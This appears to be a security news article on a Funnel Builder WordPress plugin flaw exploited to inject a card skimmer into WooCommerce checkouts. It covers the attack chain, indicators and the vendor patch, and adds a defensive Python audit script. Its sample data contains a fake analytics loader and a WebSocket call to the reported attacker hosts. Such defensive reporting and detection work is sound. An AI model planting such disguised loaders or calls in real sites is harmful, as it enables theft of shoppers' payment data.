Critical Funnel Builder WordPress Plugin Bug Exploited to Steal Credit Card Data on WooCommerce Checkouts
Security researchers revealed a critical unauthenticated vulnerability in Funnel Builder for WordPress that injects malicious JavaScript into WooCommerce checkout pages, enabling theft of credit card data. The flaw affects all versions prior to 3.15.0.3 and can be triggered through an exposed checkout endpoint to modify the plugin’s External Scripts setting, loading a skimmer that collects card numbers, CVVs, billing addresses, and other customer data. The malicious payload is disguised as a fake Google Tag Manager/Analytics script and communicates with an attacker-controlled server. FunnelKit released version 3.15.0.3 to fix the issue; admins should update immediately and audit External Scripts for rogue entries. The attack was detected by Sansec and reportedly affects more than 40,000 sites.

Funnel Builder WordPress Plugin Bug Exploited to Steal Credit Cards
Overview
A critical vulnerability in the Funnel Builder plugin for WordPress has been observed being actively exploited to inject malicious JavaScript into WooCommerce checkout pages. The flaw does not require authentication to be abused and affects all versions of the plugin prior to 3.15.0.3. Funnel Builder, a component developed by FunnelKit, is used to customize checkout experiences on WooCommerce-powered stores, featuring capabilities such as one-click upsells, landing pages, and enhancements aimed at improving conversion rates. The plugin’s popularity is indicated by data from WordPress.org, which shows Funnel Builder installed on more than 40,000 active sites.
What Happened
Security researchers at Sansec identified a malicious campaign targeting Funnel Builder installations. The attackers leverage an exposed and unprotected checkout endpoint to alter the plugin’s global settings, enabling the injection of arbitrary JavaScript into the plugin’s External Scripts setting. This manipulation occurs without requiring credentials or prior access to an administrator account, creating a stealthy path for code execution at checkout.
Technical Summary
- Vulnerability class: Unauthenticated injection of JavaScript into a WordPress plugin’s configuration (External Scripts) via the Funnel Builder’s checkout endpoint.
- Affected versions: All Funnel Builder installations prior to version 3.15.0.3.
- Malicious payload: A script masquerading as a Google Tag Manager or Google Analytics tag. The fake script loads an external JavaScript resource from a domain that is designed to resemble analytics tooling.
- Command and control: The injected script establishes a WebSocket (wss) connection to an attacker-controlled server, enabling remote control and data exfiltration.
- Delivery mechanism: The payload is delivered through a compromised “External Scripts” setting, which is normally used to load legitimate third-party scripts during checkout.
The Attack Chain
1) Initial foothold: An attacker finds and exploits an exposed, publicly accessible checkout endpoint on a vulnerable Funnel Builder installation.
2) Script injection: Through the unprotected endpoint, the attacker injects malicious JavaScript into the plugin’s External Scripts configuration. This script is set to run on every checkout page.
3) Script masquerade: The injected code is designed to appear legitimate at a glance, mimicking common analytics or tagging scripts to avoid immediate suspicion.
4) External resource loading: The script loads a remote library from a domain that resembles a legitimate analytics host, disguising itself as part of normal checkout analytics.
5) WebSocket channel: A WebSocket connection is opened to an attacker-controlled domain, enabling ongoing communication with and control of the injected code.
6) Skimming payload delivery: The attacker’s server serves a tailored payment card skimmer that targets sensitive customer data during checkout.
The Skimmer and What It Exfiltrates
- Credit card details: Primary account numbers (PANs) and related card data as entered by customers during checkout.
- Card verification data: CVVs and card expiration information, which are often collected during payment processing flows.
- Billing information: Full billing addresses, names, contact details, and other identifying data provided by the customer.
- Additional session data: Any ancillary data surfaced by the checkout process that could assist in fraud, account compromise, or subsequent purchases.
Impact and Exposure
- Scope: The vulnerability affects a large ecosystem of WordPress sites using Funnel Builder to power their WooCommerce checkouts. With more than 40,000 active installations reported, the potential exposure is substantial.
- Financial risk: The presence of a functioning card skimmer means that attackers can perform fraudulent online transactions and potentially monetize stolen card data through common underground channels.
- Long-tail risk: Beyond immediate card theft, attackers can combine stolen data with other breaches to create more convincing phishing or account takeover campaigns, leveraging the stolen addresses and contact details.
Vendor Response and Timeline
- Discovery and disclosure: Security researchers detected the malicious activity and documented the attack chain, including the nature of the payload and its targeting of the External Scripts setting.
- Payload indicators: The payload’s loader URL, analytics-reports[.]com/wss/jquery-lib.js, and its WebSocket endpoint, wss://protect-wss[.]com/ws, provided concrete indicators for defenders to monitor.
- Patch release: FunnelKit addressed the vulnerability by releasing version 3.15.0.3. This update resolved the issue that allowed malicious scripts to be injected into the plugin’s configuration and blocked the attacker’s ability to leverage the exposed checkout endpoint in this manner.
- Vendor advisory: The security advisory from FunnelKit acknowledged the issue, stating that “an issue” allowed bad actors to inject scripts, and confirmed the remediation in the corresponding release.
Indicators of Compromise
- Suspicious External Scripts: Presence of unexpected or unauthorized scripts loaded via the External Scripts setting in Funnel Builder.
- Unusual analytics payloads: JavaScript resources loaded that imitate legitimate analytics tools but serve alternative, malicious logic.
- WebSocket connections: Outbound WebSocket connections to unfamiliar or attacker-controlled domains observed during checkout sessions.
- Domain patterns: Domains that resemble analytics providers but point to nonstandard endpoints or hostnames, which may be used in the disguised payload.
- Modified plugin configuration: Unexplained changes to Funnel Builder’s global settings, particularly within the External Scripts section.
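The indicators above can be checked mechanically. The following is an added example written for this article, not code from Sansec, FunnelKit, or the plugin: it takes the raw entries an administrator has copied out of the External Scripts setting (the script does not know the plugin’s internal option name, so it works on the pasted text) and flags any entry that loads a script from a host outside an assumed allowlist, opens a `ws://` or `wss://` channel, or references either of the two hostnames the article reports. The sample entries and the allowlist are constructed for the example; the allowlist in particular is an assumption a store would replace with its own expected hosts.

```python
import re
from urllib.parse import urlparse

# Constructed sample entries of the kind an admin might find in the plugin's
# External Scripts setting (not copied from any real site). The first is a
# normal Google Tag Manager snippet; the second imitates one but pulls its
# library from a look-alike host and opens a WebSocket channel, using the two
# hostnames reported for this campaign.
SAMPLE_EXTERNAL_SCRIPTS = [
    """<script async src="https://www.googletagmanager.com/gtag/js?id=G-PLACEHOLDER"></script>
<script>window.dataLayer = window.dataLayer || [];</script>""",
    """<!-- Google Tag Manager -->
<script src="https://analytics-reports.com/wss/jquery-lib.js"></script>
<script>var s = new WebSocket("wss://protect-wss.com/ws");</script>""",
]

# Hosts this (hypothetical) store legitimately loads checkout scripts from.
# This allowlist is an assumption for the example; adjust it to the real stack.
ALLOWED_SCRIPT_HOSTS = {
    "www.googletagmanager.com",
    "www.google-analytics.com",
}

# Indicators published for this campaign, kept in defanged form and refanged
# only here so the constant itself never becomes a clickable link.
KNOWN_IOC_HOSTS = {
    h.replace("[.]", ".") for h in ("analytics-reports[.]com", "protect-wss[.]com")
}

# <script ... src="..."> attributes and any ws:// or wss:// URL in the entry.
SRC_RE = re.compile(r"""<script[^>]*\ssrc\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
WS_RE = re.compile(r"""wss?://[^\s"'<>)]+""", re.IGNORECASE)


def hostname(url: str) -> str:
    """Lower-cased host of a URL; protocol-relative '//host/x' is handled too."""
    if url.startswith("//"):
        url = "https:" + url
    return (urlparse(url).hostname or "").lower()


def audit_entry(entry: str, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of (reason, value) findings for one External Scripts entry."""
    findings = []
    for src in SRC_RE.findall(entry):
        host = hostname(src)
        if host in KNOWN_IOC_HOSTS:
            findings.append(("known-ioc-host", src))
        elif host and host not in allowed_hosts:
            findings.append(("unlisted-script-host", src))
    # A checkout page has no business opening a WebSocket from an injected
    # script, so every ws(s) endpoint is reported, IoC or not.
    for ws in WS_RE.findall(entry):
        reason = "known-ioc-host" if hostname(ws) in KNOWN_IOC_HOSTS else "websocket-endpoint"
        findings.append((reason, ws))
    return findings


def audit_external_scripts(entries, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Audit every entry; returns {index: findings} for entries needing review."""
    report = {}
    for i, entry in enumerate(entries):
        findings = audit_entry(entry, allowed_hosts)
        if findings:
            report[i] = findings
    return report


if __name__ == "__main__":
    for idx, findings in audit_external_scripts(SAMPLE_EXTERNAL_SCRIPTS).items():
        print(f"entry {idx} needs review:")
        for reason, value in findings:
            print(f"  {reason}: {value}")
```

Run against the constructed sample, the first entry passes and the second is reported twice, once for the loader URL and once for the WebSocket endpoint. A host that merely resembles an analytics provider is caught by the allowlist check rather than by name, which is the more durable of the two checks once the campaign rotates domains.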
Context and Related Coverage
- The vulnerability sits within a broader pattern of WordPress plugin flaws affecting checkout workflows, where attackers target plugin settings that inject content into the checkout flow in order to execute arbitrary scripts.
- Prior incidents in the ecosystem have demonstrated that compromised checkout or analytics scripts can have a direct impact on payment data integrity and customer trust.
- Related coverage highlights the ongoing need to scrutinize third-party plugins and their configuration interfaces, especially those that interact with checkout processes and payment data.
Conclusion
The exploitation of the Funnel Builder WordPress plugin demonstrates how a seemingly small oversight—exposed endpoints and misused configuration fields—can enable a high-impact data theft operation focused on payment card information. The attack leverages a combination of unauthenticated access, deceptive payloads, and covert data exfiltration channels to harvest sensitive customer data during checkout. The vendor’s timely release of a patched version and its advisory underscore the importance of rapid response in the face of evolving threats targeting e-commerce workflows. As attackers continue to refine their methods, plugin administrators should remain vigilant for rogue scripts and unexpected changes within checkout configurations, and monitor for indicators of compromise associated with analytics-like payloads and WebSocket communications.


